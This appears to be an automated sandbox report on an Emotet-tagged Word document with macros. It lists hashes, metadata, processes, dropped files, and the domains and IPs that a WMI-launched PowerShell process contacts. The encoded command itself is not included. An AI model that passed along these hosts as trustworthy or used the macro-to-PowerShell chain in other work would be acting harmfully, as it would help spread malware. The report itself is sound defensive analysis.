TmcIhsAzJiVyCRvsBmPUIurkYEHKZm

Full analysis: https://app.any.run/tasks/2ac412ff-a791-4d51-b76d-3326cb6478bb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 17:40:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Small, Subject: Wall, Author: Ford Walter, Keywords: Soft, Comments: structure, Template: Normal.dotm, Last Saved By: Chad Koelpin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 17:49:00 2019, Last Saved Time/Date: Wed Oct 9 17:49:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5: 9D990A8755C6C57383DDF1DADBB9672E
SHA1: 89A2A1F10B2F7E61670DB0FA12B91633CE5536FD
SHA256: 2F7C65DDCF0040BCEDF508523B6E8147E00C2D190D31FBE4AA884FB36BFA4A16
SSDEEP: 6144:lRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdZZb3tpTkPSP/bd8bijiH8pk4FiLW46die:lRIR/1OyR5Iocj3x/iEm/6/iIJ8MiRdz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    No malicious indicators.
  • SUSPICIOUS
    • PowerShell script executed
      • powershell.exe (PID: 2988)
    • Executed via WMI
      • powershell.exe (PID: 2988)
    • Creates files in the user directory
      • powershell.exe (PID: 2988)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2700)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2700)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Schroeder
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 205
Paragraphs: 1
Lines: 1
Company: Schmidt - Auer
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 176
Words: 30
Pages: 1
ModifyDate: 2019:10:09 16:49:00
CreateDate: 2019:10:09 16:49:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Chad Koelpin
Template: Normal.dotm
Comments: structure
Keywords: Soft
Author: Ford Walter
Subject: Wall
Title: Small
Total processes: 36
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1


Process information

PID: 2700
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\TmcIhsAzJiVyCRvsBmPUIurkYEHKZm.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2988
CMD: powershell -enco [encoded command not included in this copy of the report]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1,387
Read events: 903
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 15

Dropped files

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Temp\CVRD02.tmp.cvr
  Type: -
  MD5: -
  SHA256: -

PID 2988, powershell.exe
  Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\50LN3J5HRWZPKZ50SIBA.temp
  Type: -
  MD5: -
  SHA256: -

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Temp\~$cIhsAzJiVyCRvsBmPUIurkYEHKZm.doc
  Type: pgc
  MD5: 6CAC675EBE2F55304FDD2F866A8006D2
  SHA256: 5EAF805B5E31A532FBDA4D947D24B2971F7A4AAEB3D359CB11BFFD3CCB582F3B

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A66BB91C.wmf
  Type: wmf
  MD5: 57AAD5B33AAE8A73577D56CD5BA0564D
  SHA256: C58FD241DBA86BAD217B20D9F479575C4A752C475655511F805C8E2DE744BD27

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DB9D409.wmf
  Type: wmf
  MD5: 2A55CC35AC08E9FD5BBF798C95415D89
  SHA256: 48FF39759516E62075428857249B721BF10C4A35B865AA64E523C5029114D06D

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72F58E6D.wmf
  Type: wmf
  MD5: 34C9364AE50F48CECD0850BF3BA94072
  SHA256: D2B8AFF3EEDCDC3703729D17F45A569BBAAC40C2675F05409B319C92D58ED6BB

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95DCA98A.wmf
  Type: wmf
  MD5: 1072F06BE6E1D176E71E0052BF0E20D0
  SHA256: 486EF451450F2D936FA195438807CC0EF804335F85690691B5EBA8B038DB8A7B

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C45385F4.wmf
  Type: wmf
  MD5: C67BE3EFE8EFB93BE36C4A417A612093
  SHA256: A06C0C8F597584BDC5E59AEEEDE1B5151D9726C97ACB23481E881209A3972033

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1CC5A76.wmf
  Type: wmf
  MD5: 49C5D718F641C17D725BD20C4DE3C461
  SHA256: C957EBE630668E014AB6BA4346E6F5368873D72E3280405D61395E926EE6A0F0

PID 2700, WINWORD.EXE
  Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7E2EA28.wmf
  Type: wmf
  MD5: 74BDE68E29D389104763216CCA513FA3
  SHA256: 0755F2494EBA3CDFD0617FA5247B73F0AC82A5F8B637E3FF6B3E168EB69C6720
HTTP(S) requests: 0
TCP/UDP connections: 4
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID 2988, powershell.exe
  IP: 47.110.40.3:443
  Domain: www.zhizaisifang.com
  ASN: -
  CN: CN
  Reputation: unknown

PID 2988, powershell.exe
  IP: 45.56.100.50:443
  Domain: www.soprettyhairllc.com
  ASN: Linode, LLC
  CN: US
  Reputation: unknown

PID 2988, powershell.exe
  IP: 45.56.100.50:80
  Domain: www.soprettyhairllc.com
  ASN: Linode, LLC
  CN: US
  Reputation: unknown

DNS requests

Domain: www.soprettyhairllc.com
  IP: 45.56.100.50
  Reputation: unknown

Domain: www.zhizaisifang.com
  IP: 47.110.40.3
  Reputation: unknown

Threats

No threats detected
No debug info